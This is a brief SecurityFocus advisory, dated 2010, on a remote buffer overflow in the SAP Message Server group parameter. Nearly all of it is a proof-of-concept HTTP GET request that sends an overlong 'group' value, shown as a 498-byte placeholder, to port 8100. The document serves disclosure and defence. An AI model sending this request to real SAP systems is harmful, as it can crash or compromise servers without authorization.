SAP Message Server Group Parameter Remote Buffer Overflow Vulnerability

The following proof-of-concept GET request is available:

GET /msgserver/html/group?group=**498 bytes** HTTP/1.0
Accept: */*
Accept-Language: en-us
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET
CLR 1.1.4322; .NET CLR 2.0.50727)
Host: sapserver:8100
Proxy-Connection: Keep-Alive


 

Privacy Statement
Copyright 2010, SecurityFocus